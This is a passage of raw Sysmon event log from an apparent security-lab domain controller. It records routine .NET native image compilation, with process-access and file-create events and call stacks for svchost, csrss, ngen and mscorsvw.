:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:01.295{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A5-6000-C704-000000009A01}3172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:01.280{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46A5-6000-C704-000000009A01}3172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:01.280{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A5-6000-C704-000000009A01}3172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:01.170{08A6967A-46A4-6000-C604-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f30-0\System.Windows.Controls.Ribbon.dll2021-01-14 13:27:01.170 10341000x80000000000000008931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.936{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A7-6000-CD04-000000009A01}3344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.920{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46A7-6000-CD04-000000009A01}3344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.920{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A7-6000-CD04-000000009A01}3344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:03.874{08A6967A-46A7-6000-CC04-000000009A01}2300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8fc-0\System.Windows.Input.Manipulations.dll2021-01-14 13:27:03.874 10341000x80000000000000008927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.764{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A7-6000-CC04-000000009A01}2300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.749{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46A7-6000-CC04-000000009A01}2300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.749{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A7-6000-CC04-000000009A01}2300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.717{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A7-6000-CB04-000000009A01}3044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.702{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46A7-6000-CB04-000000009A01}3044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.702{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A7-6000-CB04-000000009A01}3044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:03.639{08A6967A-46A7-6000-CA04-000000009A01}4292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10c4-0\System.Windows.Forms.DataVisualization.Design.dll2021-01-14 13:27:03.639 10341000x80000000000000008920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A7-6000-CA04-000000009A01}4292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.467{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46A7-6000-CA04-000000009A01}4292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.467{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A7-6000-CA04-000000009A01}4292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.405{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A7-6000-C904-000000009A01}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.389{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46A7-6000-C904-000000009A01}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:03.389{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A7-6000-C904-000000009A01}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:03.233{08A6967A-46A5-6000-C804-000000009A01}4428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\114c-0\System.Windows.Forms.DataVisualization.dll2021-01-14 13:27:03.233 10341000x80000000000000008941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:04.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A8-6000-D004-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:04.405{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46A8-6000-D004-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:04.405{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A8-6000-D004-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:04.186{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A8-6000-CF04-000000009A01}1396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\S